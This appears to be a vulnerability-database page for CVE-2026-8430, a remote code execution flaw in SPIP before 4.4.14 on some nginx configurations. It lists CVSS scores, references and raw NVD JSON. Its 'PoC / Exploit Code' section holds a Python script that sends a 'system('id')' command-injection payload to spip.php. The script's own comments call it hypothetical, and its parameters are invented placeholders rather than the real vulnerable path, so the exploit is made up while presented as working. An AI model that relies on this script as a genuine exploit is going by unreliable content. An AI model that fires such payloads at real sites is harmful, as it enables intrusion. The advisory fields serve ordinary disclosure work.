CVE-2026-8430

Description

SPIP versions prior to 4.4.14 contain a remote code execution vulnerability in the public space that is limited to certain nginx configurations, allowing attackers to execute arbitrary code in the context of the web server. Attackers can exploit this vulnerability through specific nginx configuration scenarios to achieve code execution, and this issue is not mitigated by the SPIP security screen.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SPIP < 4.4.14

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_spip_rce(target_url):
    """
    Conceptual PoC for CVE-2026-8430.
    Exploits RCE in SPIP < 4.4.14 on specific Nginx configs.
    """
    # Target endpoint in public space
    url = f"{target_url}/spip.php"
    
    # Hypothetical payload to execute system command (e.g., 'id')
    # The specific parameter depends on the actual vulnerable code path
    # which is often related to variable injection or path traversal.
    params = {
        "page": "vulnerable_page", 
        "var_mode": "calcul",
        "exec_code": "system('id');" 
    }

    headers = {
        "User-Agent": "VulnCheck-Scanner/1.0"
    }

    try:
        response = requests.get(url, params=params, headers=headers, timeout=10)
        
        # Check if the command execution output is present in response
        if response.status_code == 200 and ("uid=" in response.text or "gid=" in response.text):
            print(f"[+] Exploit successful! Target: {target_url}")
            print(f"[+] Response snippet: {response.text[:200]}")
            return True
        else:
            print(f"[-] Exploit failed or target not vulnerable.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False

if __name__ == "__main__":
    target = "http://127.0.0.1" # Replace with actual target
    exploit_spip_rce(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8430
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8430
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8430/
[4] VulDB https://vuldb.com/cve/CVE-2026-8430
[5] https://blog.spip.net/
[6] https://www.vulncheck.com/advisories/spip-prior-to-remote-code-execution-via-nginx

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8430", "sourceIdentifier": "[email protected]", "published": "2026-05-12T19:16:34.703", "lastModified": "2026-05-12T20:16:47.080", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SPIP versions prior to 4.4.14 contain a remote code execution vulnerability in the public space that is limited to certain nginx configurations, allowing attackers to execute arbitrary code in the context of the web server. Attackers can exploit this vulnerability through specific nginx configuration scenarios to achieve code execution, and this issue is not mitigated by the SPIP security screen."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://blog.spip.net/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/spip-prior-to-remote-code-execution-via-nginx", "source": "[email protected]"}]}}